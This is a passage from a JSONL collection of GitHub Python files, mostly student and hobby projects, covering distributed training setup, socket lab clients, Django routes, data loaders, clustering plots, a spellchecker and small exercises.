os.path.abspath('./torch_distributed_init.store')\n log.info(f'Using file-based distributed initialization at {store_path}')\n trainer_kwargs['accelerator'] = 'ddp'\n trainer_kwargs['plugins'] = DDPPlugin(init_method='file://' + store_path, find_unused_parameters=False)\n\n if hasattr(config, 'optim') and hasattr(config.optim, 'gradient_clip_norm'):\n if config.optim.gradient_clip_norm is not None:\n trainer_kwargs['gradient_clip_val'] = config.optim.gradient_clip_norm\n\n if config.mixed_precision:\n if config.num_gpus == 0:\n logging.getLogger(__name__).warn('Requested 16-bit precision but no GPUs. 16-bit precision training is not available on CPU, it has been disabled for now.')\n else:\n trainer_kwargs['precision'] = 16\n\n trainer_kwargs.update(kwargs)\n\n trainer = pytorch_lightning.Trainer(\n callbacks=callbacks,\n **trainer_kwargs)\n\n return trainer\n\n\nclass DDPPlugin(pytorch_lightning.plugins.DDPPlugin):\n \"\"\"Custom DDP plugin which allows for the specification of the torch distributed initialization method.\n \"\"\"\n def __init__(\n self,\n init_method: str = \"env://\",\n parallel_devices: Optional[List[torch.device]] = None,\n num_nodes: int = 1,\n cluster_environment: ClusterEnvironment = None,\n sync_batchnorm: bool = False,\n ddp_comm_state: Optional[object] = None,\n ddp_comm_hook: Optional[callable] = None,\n ddp_comm_wrapper: Optional[callable] = None,\n **kwargs: Union[Any, Dict[str, Any]],\n ) -> None:\n super().__init__(parallel_devices, num_nodes, cluster_environment, sync_batchnorm, ddp_comm_state, ddp_comm_hook, ddp_comm_wrapper, **kwargs)\n self.init_method = init_method\n\n def init_ddp_connection(self, global_rank: Optional[int]=None, world_size: Optional[int]=None) -> None:\n global_rank = global_rank if global_rank is not None else self.cluster_environment.global_rank()\n world_size = world_size if world_size is not None else self.cluster_environment.world_size()\n if not torch.distributed.is_initialized():\n log.info(f\"initializing ddp: GLOBAL_RANK: {global_rank}, MEMBER: {global_rank + 1}/{world_size}\")\n torch.distributed.init_process_group(\n self.torch_distributed_backend,\n init_method=self.init_method,\n rank=global_rank, world_size=world_size)\n","repo_name":"PrincetonLIPS/vitruvion","sub_path":"img2cad/lightning.py","file_name":"lightning.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"}
+{"seq_id":"1571275504","text":"import socket\n\nsuccess = \"gatito uwu\"\nattempt = 1\nwhile(success != \"200: SUCCESS\"):\n host = \"jdiaz.inf.santiago.usm.cl\"\n port = 50008\n print(f\"\\n** NUEVO INTENTO: INTENTO NUMERO {attempt}**\")\n\n #obtención de datos de la imagen por udp\n msg = \"GET NEW IMG DATA\".encode()\n image_properties = []\n u1=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n u1.sendto(msg, (host,port))\n print(f\"Mensaje enviado a {host}:{port} por UDP: {msg}\")\n response = u1.recvfrom(1024)[0].decode()\n res = response.strip().split()\n print(f\"Mensaje recibido de {host}:{port} por UDP: {response}\")\n u1.close()\n print(\"Comenzando escritura de la imagen :o\")\n\n for i in res:\n image_properties.append(i.split(\":\")[1])\n\n #calculo del tamaño de la imagen\n buff = int(image_properties[1])*int(image_properties[2]) *3\n image_properties = [int(i) for i in image_properties]\n port = image_properties[3]\n\n if(len(image_properties) == 6): #este corresponde al primer input\n msg =f\"GET 1/2 IMG ID:{str(image_properties[0])}\"\n else:\n 
msg=f\"GET 1/3 IMG ID:{str(image_properties[0])}\" \n\n #obtencion primera parte de la imagen por tcp\n t1=socket.socket(socket.AF_INET,socket.SOCK_STREAM ) #conexion por tcp\n t1.connect((host,port))\n t1.sendto(msg.encode(), (host,port))\n print(f\"Mensaje enviado a {host}:{port} por TCP: {msg}\")\n part1 = t1.recvfrom(int(buff))[0]\n print(f\"Mensaje recidibo de {host}:{port} por TCP\")\n t1.close()\n\n #obtencion segunda parte de la imagen con udp\n if(len(image_properties) == 6): \n msg =f\"GET 2/2 IMG ID:{str(image_properties[0])}\"\n else:\n msg=f\"GET 2/3 IMG ID:{str(image_properties[0])}\"\n port =image_properties[4]\n u2=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n u2.sendto(msg.encode(), (host,port))\n print(f\"Mensaje enviado a {host}:{port} por UDP: {msg}\")\n part2 = u2.recvfrom(buff)[0] \n print(f\"Mensaje recidibo de {host}:{port} por UDP\")\n u2.close()\n\n #obtencion tercera parte de la imagen con udp\n flag = False\n if(len(image_properties) == 7): \n flag = True\n port = image_properties[5]\n msg=f\"GET 3/3 IMG ID:{str(image_properties[0])}\"\n u3=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n u3.sendto(msg.encode(), (host,port))\n print(f\"Mensaje enviado a {host}:{port} por UDP: {msg}\")\n part3 = u3.recvfrom(buff)[0]\n print(f\"Mensaje recidibo de {host}:{port} por UDP\")\n u3.close()\n\n #mensaje de verificación por tcp\n port = image_properties[-1]\n t2=socket.socket(socket.AF_INET,socket.SOCK_STREAM ) #conexion por tcp\n t2.connect((host,port)) \n if flag:\n complete_image = part1 + part2 + part3\n complete_image= part1 + part2\n \n t2.sendto(complete_image, (host,port))\n print(f\"Mensaje enviado a {host}:{port} por TCP\")\n success = t2.recvfrom(1024)[0].decode()\n print(f\"Mensaje recibido de {host}:{port} por TCP: {success}\")\n print(F\"** FIN DE INTENTO {attempt}**\\n\")\n attempt += 1\n t2.close()\n\n\n#Escritura de la imagen\nname = f\"{image_properties[0]}.png\"\nimage = open(name, \"wb\")\nimage.write(complete_image)\nimage.close()\nprint(\"Imagen recibida y escritura finalizada :D\")","repo_name":"sofiwiwiwi/2023_01-Redes","sub_path":"Lab_1/tarea1.py","file_name":"tarea1.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38587735963","text":"import tensorflow as tf\ntensorflow_version = tf.__version__\ngpu_avilable = tf.test.is_gpu_available()\n\nprint(\"tensorflow version:\",tensorflow_version,\"\\tGPU avilable:\",gpu_avilable)\n\na = tf.constant([1.0,2.0],name=\"a\")\nb = tf.constant([1.0,2.0],name=\"b\")\nresult = tf.add(a,b,name=\"add\")\n\n# print(result)\n\n# import tensorflow as tf\n# print(tf.__version__)\n# print(tf.test.is_gpu_available())","repo_name":"Inspring6/OpenCV_TensorFlow","sub_path":"test files/test_TensorFlow.py","file_name":"test_TensorFlow.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36645300409","text":"import ascii_art\nimport GUI2_LOGIN_SCREEN\nimport GUI2_REGISTER_SCREEN\n\nprint(ascii_art.logo)\n\nuser_choice = int(input('1) Already A Registered User ,Sign-In.\\n2) Not A User ,Register.\\nEnter Your Choice (1/2) : '))\nif user_choice == 1:\n GUI2_LOGIN_SCREEN.main()\nelif user_choice == 2:\n GUI2_REGISTER_SCREEN.main()\nelse:\n print('Invalid Choice')\n","repo_name":"Parshwa0409/Firebase-Classroom","sub_path":"GUI 
VERSION/GUI_MAIN.py","file_name":"GUI_MAIN.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9048983147","text":"from django.urls import path, include\nfrom . import views\nfrom .views import TaskList, TaskDetail, TaskCreate, TaskUpdate, TaskDelete, CustomLoginView\nfrom django.contrib.auth.views import LoginView, LogoutView\n\n\nurlpatterns = [\n # ==== path Converters ====\n # int: numbers\n # str: strings\n # path: whole url / \n # slug: hyphen-and_underscore_stuff\n # UUID: universally unique identifier\n # path('/', views.home, name='home'),\n # path('login/', CustomLoginView.as_view(), name='login'),\n path('register/', views.registerPage, name='register-page'),\n path('login/', views.loginPage, name='login-page'),\n # path('logout/', views.logoutPage, name='logout-page'),\n path('logout/', LogoutView.as_view(next_page='home'), name='logout-page'),\n\n\n path('', views.dashboard, name='dashboard'),\n path('auditor/', views.audit, name='auditor'),\n path('cs/', views.cs, name='cs'),\n path('inspector/', views.inspection, name='inspector'),\n path('task/', TaskList.as_view(), name='tasks'),\n path('task/', TaskDetail.as_view(), name='task-detail'),\n path('task-create', TaskCreate.as_view(), name='task-create'),\n path('task-update/', TaskUpdate.as_view(), name='task-update'),\n path('task-delete/', TaskDelete.as_view(), name='task-delete'),\n]","repo_name":"idfldev/Python-Examples","sub_path":"project_3/staff/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2496094735","text":"from torchvision import transforms\nfrom base.base_dataloader import BaseDataLoader\nfrom dataset.datasets import UAVDataset\nfrom utils import UAVCollator\nfrom tokenizers import Tokenizer\nfrom tokenizers.models import BPE\nfrom tokenizers.pre_tokenizers import Whitespace\nfrom tokenizers.trainers import BpeTrainer\n\nfrom tokenizers import (\n decoders,\n models,\n normalizers,\n pre_tokenizers,\n processors,\n trainers,\n Tokenizer,\n)\n\n\nclass UAVDataLoader(BaseDataLoader):\n \"\"\"\n MNIST data loading demo using BaseDataLoader\n \"\"\"\n\n def __init__(\n self,\n image_dir,\n questions_path,\n test_imgs,\n batch_size,\n shuffle=True,\n validation_split=0.0,\n num_workers=1,\n training=True,\n overfitting=False,\n generator=None,\n ):\n trsfm = transforms.Compose([transforms.Normalize((0.1307,), (0.3081,))])\n print(\"Building tokenizer..\")\n tokenizer = Tokenizer(BPE(unk_token=\"[UNK]\"))\n tokenizer.normalizer = normalizers.BertNormalizer(\n lowercase=True\n ) # Picked just to test\n tokenizer.pre_tokenizer = pre_tokenizers.BertPreTokenizer()\n trainer = BpeTrainer(special_tokens=[\"[PAD]\", \"[UNK]\", \"[SOS]\", \"[EOS]\"])\n tokenizer.train(files=[\"dataset/questions.txt\"], trainer=trainer)\n sos_token_id = tokenizer.token_to_id(\"[SOS]\")\n eos_token_id = tokenizer.token_to_id(\"[EOS]\")\n tokenizer.post_processor = processors.TemplateProcessing(\n single=f\"[SOS] $A [EOS]\",\n special_tokens=[(\"[SOS]\", sos_token_id), (\"[EOS]\", eos_token_id)],\n )\n print(\"Done! 
Tokenizer built!\")\n\n self.tokenizer = tokenizer\n self.vocab_size = tokenizer.get_vocab_size()\n self.collate_fn = UAVCollator(self.tokenizer)\n self.dataset = UAVDataset(\n image_dir,\n questions_path,\n test_imgs,\n transform=trsfm,\n training=training,\n overfitting=overfitting,\n )\n self.generator = generator\n\n super().__init__(\n self.dataset,\n batch_size,\n shuffle,\n validation_split,\n num_workers,\n collate_fn=self.collate_fn,\n generator=generator,\n )\n","repo_name":"RicRicci22/creativity_paper","sub_path":"data_loader/data_loaders.py","file_name":"data_loaders.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13171112159","text":"import sys, threading, time, logging, random\nsys.path.append('.')\nfrom pkg.breaker import addBreaker\n\n@addBreaker\ndef threading_semaphore():\n class ActivePool:\n def __init__(self):\n super(ActivePool, self).__init__()\n self.active = []\n self.lock = threading.Lock()\n def makeActive(self, name):\n with self.lock:\n self.active.append(name)\n logging.debug('Running: %s', self.active)\n def makeInactive(self, name):\n with self.lock:\n self.active.remove(name)\n logging.debug('Running: %s', self.active)\n\n def worker(s, pool):\n logging.debug('Waiting to join the pool')\n with s:\n name = threading.current_thread().getName()\n pool.makeActive(name)\n time.sleep(0.1)\n pool.makeInactive(name)\n\n logging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s (%(threadName)-2s) %(message)s',\n )\n pool = ActivePool()\n s = threading.Semaphore(2)\n for i in range(4):\n t = threading.Thread(\n target=worker,\n name=str(i),\n args=(s, pool),\n )\n t.start()\n pass\n\nif __name__ == \"__main__\":\n \"\"\"\n Sometimes it is useful to allow more than one worker access to a resource at a time,\n while still limiting the overall number.\n\n For example, a connection pool might support a fixed number of simultaneous connection,\n or a network application might support a fixed number of concurrent downloads.\n\n A `semaphore` is one way to manage those connections\n \n A real resource pool would allocate a connection or \n some other value to the newly active thread,\n and reclaim the value when the thread is done.\n \"\"\"\n threading_semaphore()","repo_name":"wellqin/USTC","sub_path":"PythonBasic/base_pkg/python-06-stdlib-review/chapter-10-ConcurrencyWithProcessThreadsCoroutines/10.3-threading/py_10_threadingLimitConcurrentAccessToResources.py","file_name":"py_10_threadingLimitConcurrentAccessToResources.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37058288043","text":"#!/usr/bin/env python3\n\nimport sys\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy as sp\nimport numpy as np\nimport seaborn as sns\nimport scipy.cluster.hierarchy as hac\n\ndf=pd.read_csv(sys.argv[1], sep=\"\\t\", header=0, index_col=0)\n#print(df)\narray=np.array(df)\n#print(array)\ndt=hac.linkage(df,'average')\n#print(dt)\nsortedarray=hac.leaves_list(dt)\n#print(sortedarray)\nnew_list=[]\nfor i in sortedarray:\n new_list.append(array[i])\nnewarray=np.asarray(new_list)\n#print(newarray)\n\n# sns.heatmap(newarray)\n# plt.show()\n\ncell_type=np.transpose(newarray)\ndcell=hac.linkage(cell_type,'average')\nsortedarraycell=hac.leaves_list(dcell)\nnew_list_cell=[]\nfor a in sortedarraycell:\n 
new_list_cell.append(cell_type[a])\nnewarray_cell_type=np.asarray(new_list_cell)\ncell_type_transposeback=np.transpose(newarray_cell_type)\n\n\nnames=[\"CFU\",\"poly\",\"unk\",\"int\",\"mys\",\"mid\"]\ncolumns=df.columns\ncelltypecolumn=[]\n# for m in sortedarray:\n# genescolumn.append(columns[m])\nfor n in sortedarraycell:\n celltypecolumn.append(columns[n])\n\n\n# fig,ax=plt.subplots(sharey=True)\n# hac.dendrogram(dcell,ax=ax)\n# plt.xlabel(\"Cell type\")\n# plt.ylabel(\"Differentiation\")\n# ax.set_xticklabels([names[1],names[2],names[0],names[4],names[3],names[5]])\n# plt.tight_layout()\n# fig.savefig(\"dendrogram\")\n#\n# plt.show()\n# quit()\n#print(sortedarray)\nfig,(ax1,ax2,ax3)=plt.subplots(ncols=3)\nsns.heatmap(array, ax=ax1)\nsns.heatmap(newarray, ax=ax2)\nsns.heatmap(cell_type_transposeback,ax=ax3)\n\nax1.set_xlabel(\"cell type\")\nax2.set_xlabel(\"cell type\")\nax3.set_xlabel(\"cell type\")\nax1.set_xticklabels(columns)\nax1.set_ylabel(\"Genes\")\nax2.set_ylabel(\"Genes\")\nax3.set_ylabel(\"Genes\")\nax2.set_xticklabels(columns)\nax1.set_title(\"Nonsorted\")\nax2.set_title(\"Genes sorted\")\nax3.set_title(\"Genes & Cell type sorted\")\nax3.set_xticklabels(celltypecolumn)\n\nplt.tight_layout()\n\nfig.savefig(\"heatplots\")\nplt.show()\n\n# quit()\n# plt.pcolor(df)\n# plt.yticks(np.arange(0.5, len(df.index), 1), df.index)\n# plt.xticks(np.arange(0.5, len(df.columns), 1), df.columns)\n# plt.show()","repo_name":"Raquelmeur/qbb2019-answer","sub_path":"week8/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19787638001","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType,StructField, IntegerType, FloatType\nfrom pyspark.sql import functions as func\n\nspark = SparkSession.builder.appName(\"TotalSpent\").getOrCreate()\n\nschema = StructType([\n StructField(\"ID\",IntegerType(),True),\n StructField(\"item_id\",IntegerType(),True),\n StructField(\"spent\",FloatType(),True)\n])\n\ndf = spark.read.schema(schema).csv(\"data/customer-orders.csv\")\ntotalByCustomer = df.groupBy(\"ID\").agg(func.round(func.sum(\"spent\"),2).alias(\"total_spent\")).show()\n\nspark.stop()\n\n","repo_name":"emrhnksck/learn-spark","sub_path":"total-spent-dataframe.py","file_name":"total-spent-dataframe.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5113679840","text":"import random\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport requests\nimport config\n# import reset\n\n# Authorize Google Sheets\ntry:\n\tscope = [\"https://spreadsheets.google.com/feeds\", \"https://www.googleapis.com/auth/drive\"]\n\tcredentials = ServiceAccountCredentials.from_json_keyfile_name(config.credentials, scope)\n\tgc = gspread.authorize(credentials)\nexcept OSError as e:\n\tprint(\"JSON file with Google account credentials not found!\")\n\tprint(\"Make sure you've followed the README instructions and added the filepath of your credentials file to config.py\")\n\texit(1)\n\n# Open sheets\ndatasheet = gc.open(config.spreadsheet).worksheet(\"datasheet\")\n\n# Get question and options from current index\n\nfor x in range(2, 50):\n print(x) \n\n if datasheet.cell(x, 1).value > \"\":\n prasad_date = datasheet.cell(x, 1).value \n prasad_count = datasheet.cell(x, 2).value\n print(\"date:\", prasad_date) \n 
print(\"count:\", prasad_count) \n\n# if prasad_date == \"\":\n#\tprint(\"No questions found in the Google sheet!\")\n#\texit(1)\n# else","repo_name":"ranjithp361/hpow","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2336228033","text":"from tkinter import *\r\n\r\nimport mysql.connector as msql\r\nfrom tkinter import messagebox\r\n\r\nmycon=msql.connect(host='localhost', user='root', passwd='root', database='lib')\r\n\r\ncur=mycon.cursor()\r\ndef View(): \r\n global bookInfo1 ,bookInfo2, bookInfo3, bookInfo4, Canvas1, mycon, cur, bookTable, root\r\n bookTable = \"books\"\r\n root = Tk()\r\n root.title(\"Library\")\r\n root.minsize(width=400,height=400)\r\n root.geometry(\"600x500\")\r\n Canvas1 = Canvas(root) \r\n Canvas1.config(bg=\"#12a4d9\")\r\n Canvas1.pack(expand=True,fill=BOTH)\r\n headingFrame1 = Frame(root,bg=\"#FFBB00\",bd=5)\r\n headingFrame1.place(relx=0.25,rely=0.1,relwidth=0.5,relheight=0.13)\r\n headingLabel = Label(headingFrame1, text=\"View Books\", bg='black', fg='white', font = ('Courier',15))\r\n headingLabel.place(relx=0,rely=0, relwidth=1, relheight=1)\r\n labelFrame = Frame(root,bg='black')\r\n labelFrame.place(relx=0.1,rely=0.3,relwidth=0.8,relheight=0.5)\r\n y = 0.25\r\n Label(labelFrame, text=\"%-10s%-40s%-30s%-20s\"%('BID','Title','Author','Status'),\r\n bg='black',fg='white').place(relx=0.07,rely=0.1)\r\n Label(labelFrame, text = \"----------------------------------------------------------------------------\",bg='black',fg='white').place (relx=0.05,rely=0.2)\r\n getBooks = \"select * from \"+bookTable\r\n try:\r\n cur.execute(getBooks)\r\n for i in cur:\r\n Label(labelFrame,text=\"%-10s%-30s%-30s%-20s\"%(i[0],i[1],i[2],i[3]) ,bg='black', fg='white').place(relx=0.07,rely=y)\r\n y += 0.1\r\n mycon.commit()\r\n except:\r\n messagebox.showinfo(\"Error\",\"Failed to fetch files from database\")\r\n def export():\r\n ex='select * from books'\r\n cur.execute(ex)\r\n l=cur.fetchall()\r\n fh=open(\".//Exports//data.txt\",\"w\")\r\n for i in l:\r\n i=str(i)+'\\n'\r\n fh.write(str(i))\r\n messagebox.showinfo(\"Success\",\"File exported to CS_Project/Exports/data.txt\")\r\n quitBtn = Button(root,text=\"Quit\",bg='#f7f1e3', fg='black', command=root.destroy)\r\n quitBtn.place(relx=0.6,rely=0.9, relwidth=0.18,relheight=0.08)\r\n exBtn = Button(root,text=\"Export\",bg='#f7f1e3', fg='black', command=export)\r\n exBtn.place(relx=0.2,rely=0.9, relwidth=0.18,relheight=0.08) \r\n root.mainloop()\r\n","repo_name":"Sid1125/LibraryManagementSystem","sub_path":"CS_Project/ViewBooks.py","file_name":"ViewBooks.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2050851307","text":"#!/usr/bin/python3.4\n# -*- coding: utf-8 -*-\n\nimport logging\nimport numpy\nfrom .dictionary import Dictionary\nfrom collections import defaultdict\nfrom difflib import ndiff\n\nlogging.basicConfig(\n format='%(levelname)s %(asctime)s : %(message)s',\n datefmt='%m/%d/%Y %I:%M:%S %p',\n level=logging.DEBUG)\nlogger = logging.getLogger('spellchecker')\n\n\ndef ld(s, t):\n if s == \"\":\n return len(t)\n if t == \"\":\n return len(s)\n if s[-1] == t[-1]:\n cost = 0\n else:\n cost = 1\n\n res = min([ld(s[:-1], t) + 1,\n ld(s, t[:-1]) + 1,\n ld(s[:-1], t[:-1]) + cost])\n\n return res\n\n\ndef levenshtein_distance(str1, str2, ):\n counter = {\"+\": 0, \"-\": 0}\n 
distance = 0\n    for edit_code, *_ in ndiff(str1, str2):\n        if edit_code == \" \":\n            distance += max(counter.values())\n            counter = {\"+\": 0, \"-\": 0}\n        else:\n            counter[edit_code] += 1\n    distance += max(counter.values())\n    return distance\n\nclass Spellchecker:\n    \"\"\" Класс спеллчекера.\n    В нем реализованы функции поиска кандидатов исправлений для слов запроса.\n    \"\"\"\n    def __init__(self, arg):\n        if isinstance(arg, str):\n            self.dictionary = Dictionary(arg)\n        elif isinstance(arg, Dictionary):\n            self.dictionary = arg\n        else:\n            self.dictionary = Dictionary()\n\n        self.soundex_index = self.build_soundex_index()\n\n    def build_soundex_index(self):\n        \"\"\"Строит индекс между кодами soundex и словами словаря.\n\n        Для каждого слова из словаря строится код soundex и затем слово добавляется в список,\n        соответсвующий этому коду.\n\n        код soundex -> [слово1, слово2, ...]\n\n        Возвращаемое значение:\n        - Данный метод ничего не возвращает.\n        \"\"\"\n        index = defaultdict(list)\n        for word, _ in self.dictionary.words.items():\n            index[Dictionary.soundex(word)].append(word)\n\n        return dict(index)\n\n    @staticmethod\n    def levenshtein_distance(word1, word2):\n        \"\"\"Расстояние Левенштейна\n\n        Рассчитывает расстояние Левенштейна между словами с операциями вставки, удаления и замены символов.\n        Вес каждой операции равен 1.\n\n        Параметры:\n        - word1: первое слово\n        - word2: второе слово\n\n        Возвращаемое значение:\n        - Расстояние между словами word1 и word2.\n        \"\"\"\n        # return ld(word1, word2)\n        return levenshtein_distance(word1, word2)\n\n    def is_correct(self, word):\n        \"\"\"Слово есть в словаре\n\n        Параметры:\n        - word: слово для проверки\n\n        Возвращаемое значение:\n        - True если слово есть в словаре, иначе False\n        \"\"\"\n        return self.dictionary.get(word) != 0\n\n    def get_candidates(self, word, max_distance=3):\n        \"\"\"Поиск списка кандидатов для исправления слова\n\n        Возвращает список кандидатов, отсортированных в порядке убывания частоты встречаемости слова в корпусе.\n        Таким образом, мы будем для исправления отдавать наиболее часто встречаемы словам в случае равных\n        расстояний редактирования.\n\n        В данном методе поиск кандидатов осуществляется перебором всех возможножных вариантов из словаря.\n\n        Параметры:\n        - word: слово для исправления\n        - max_distance: опциональный параметр, задает допустимое максимальное число исправлений для кандидатов.\n\n        Возвращаемое значение:\n        - Список слов кандидатов с минимальным расстоянием редактирования, отсортированных в порядке убывания\n        частоты в корпусе.\n        \"\"\"\n\n        candidates_thres = []\n        min_distance_found = float(\"inf\")\n        for candidate in self.dictionary.words:\n            distance = self.levenshtein_distance(word, candidate)\n            if distance > max_distance:\n                continue\n            if distance < min_distance_found:\n                min_distance_found = distance\n                candidates_thres = []\n            elif distance > min_distance_found:\n                continue\n            candidates_thres.append(tuple([candidate, distance, self.dictionary.words[candidate]]))\n        candidates_thres = sorted(candidates_thres,\n                                  key=lambda x: tuple([x[1], -1*x[2]])\n                                  )\n        # logger.info(\"get_candidates: word={}, min_distance_found={}, candidates_thres={}\"\n        #             .format(word, min_distance_found, candidates_thres))\n        candidates = [_[0] for _ in candidates_thres]\n\n        return candidates\n\n    def get_candidates_fast(self, word, max_distance=3):\n        \"\"\"Быстрый поиск списка кандидатов для исправления слова\n\n        Предыдущий метод работает очень долго - нужно посчитать расстояние между словом и всеми словами из словаря.\n        Для того, чтобы сократить список слов для перебора мы будем 
считать расстояние только между словами,\n имеющими такой же код soundex как и у проверяемого слова.\n\n Параметры:\n - word: слово для исправления\n - max_distance: опциональный параметр, задает допустимое максимальное число исправлений для кандидатов.\n\n Возвращаемое значение:\n - Список слов кандидатов с минимальным расстоянием редактирования, отсортированных в порядке убывания\n частоты в корпусе.\n \"\"\"\n word_soundex = self.dictionary.soundex(word)\n if word_soundex not in self.dictionary.soundex_map:\n return []\n\n candidates_by_soundex = self.dictionary.soundex_map[word_soundex]\n # logger.info(\"get_candidates_fast: word={}, candidates_by_soundex={}\".format(word, candidates_by_soundex))\n\n candidates_thres = []\n min_distance_found = float(\"inf\")\n for candidate in candidates_by_soundex:\n distance = self.levenshtein_distance(word, candidate)\n if distance > max_distance:\n continue\n if distance < min_distance_found:\n min_distance_found = distance\n candidates_thres = []\n elif distance > min_distance_found:\n continue\n candidates_thres.append(tuple([candidate, distance, self.dictionary.words[candidate]]))\n candidates_thres = sorted(candidates_thres,\n key=lambda x: tuple([x[1], -1 * x[2]])\n )\n # logger.info(\"get_candidates: word={}, min_distance_found={}, candidates_thres={}\"\n # .format(word, min_distance_found, candidates_thres))\n candidates = [_[0] for _ in candidates_thres]\n\n return candidates\n\n","repo_name":"ladamalina/coursera-poisk","sub_path":"week-3__fuzzy_search/spellchecker/spellchecker.py","file_name":"spellchecker.py","file_ext":"py","file_size_in_byte":8167,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30100990307","text":"\"\"\"\r\nA **Harshad** number is a number which is divisible by the sum of its digits.\nFor example, 132 is divisible by 6 (1+3+2).\n\nA subset of the Harshad numbers are the **Moran** numbers. Moran numbers yield\na prime when divided by the sum of their digits. 
For example, 133 divided by 7\n(1+3+3) yields 19, a prime.\n\nCreate a function that takes a number and returns `\"M\"` if the number is a\nMoran number, `\"H\"` if it is a (non-Moran) Harshad number, or `\"Neither\"`.\n\n### Examples\n\n    moran(132) ➞ \"H\"\n    \n    moran(133) ➞ \"M\"\n    \n    moran(134) ➞ \"Neither\"\n\n### Notes\n\nN/A\n\n\"\"\"\r\n\ndef isPrime(number):\n    isAPrimeNumber = number > 1\n    for i in range(2, number): \n        if (number % i) == 0: \n            isAPrimeNumber = False \n            break\n        else: \n            isAPrimeNumber = True\n    return isAPrimeNumber\ndef moran(number):\n    numberStr = str(number)\n    sumOfDigits = 0\n    for i in numberStr:\n        sumOfDigits += int(i)\n    if number % sumOfDigits == 0:\n        if isPrime(int(number/sumOfDigits)) == True:\n            return \"M\"\n        else:\n            return \"H\"\n    else:\n        return \"Neither\"\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"YTf8DZbTkzJ3kizNa_5.py","file_name":"YTf8DZbTkzJ3kizNa_5.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"4965681417","text":"# -*- coding: utf-8 -*-\n\nimport threading\n\n_MAX_SEMAPHORE = 10\n\ndef call_api_with_multithread(api_method, target_lines):\n    def worker(line, results, i, semaphore):\n        with semaphore:\n            results[i] = api_method(line)\n\n    results = [(\"\", \"\")] * len(target_lines)\n    s = threading.Semaphore(_MAX_SEMAPHORE)\n    for i, line in enumerate(target_lines):\n        if line:\n            t = threading.Thread(target=worker, args=(line, results, i, s))\n            t.start()\n    # waiting for threads to complete\n    main_thread = threading.currentThread()\n    for t in threading.enumerate():\n        if t is not main_thread:\n            t.join()\n    return results\n\ndef get_ip_address():\n    import socket\n    try:\n        ip = socket.gethostbyname(socket.gethostname())\n    except:\n        ip = \"127.0.0.1\"\n    return ip\n","repo_name":"t2y/ikazuchi","sub_path":"src/ikazuchi/core/translator/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"73534760091","text":"#FILE: classMol.py\r\n#PURPOSE: This file contains the class Mol, which models a particular molecular species.\r\n\r\nclass Mol(object):\r\n#FUNCTION: __init__\r\n#PURPOSE: This function initializes the current Mol with given parameters.\r\n#INPUTS: energy = molecular bond breaking energy (K); mass = molecule mass (kg); xtot = xmolgr + xmolgas = total molecular fraction for molecule (over both grain and gas) of base nH; name = molecule chemical formula\r\n\tdef __init__(self, xtot, mass, energy, name):\r\n\t\t#Automatic attributes\r\n\t\tself.xtot = xtot\r\n\t\tself.mass = mass\r\n\t\tself.energy = energy\r\n\t\tself.name = name\r\n\t\tself.elements = self.getElements(name)\r\n\r\n\t\t\r\n#FUNCTION:\r\n#PURPOSE: This function is meant to take the chemical formula of a molecule and separate it into element components with counted frequencies.\r\n#EXAMPLE: 'H2O' would return the dictionary {'H':2, 'O':1}\r\n#INPUTS: name = molecular species's chemical formula as string\t\r\n\tdef getElements(self, name):\r\n\t\t#Below Section: Records the elements in molecule\r\n\t\telements = {}\r\n\t\telhere = name[0]\r\n\t\tdighere = ''\r\n\t\tfor a in range(0, len(name)):\r\n\t\t\t#Below handles if current letter in alphabet\r\n\t\t\tif name[a].isalpha():\r\n\t\t\t\t#If continued name of current element\r\n\t\t\t\tif name[a].islower():\r\n\t\t\t\t\telhere = elhere + name[a]\r\n\t\t\t\t\t\t\t\t\t\t\r\n\t\t\t\t#Else if new element 
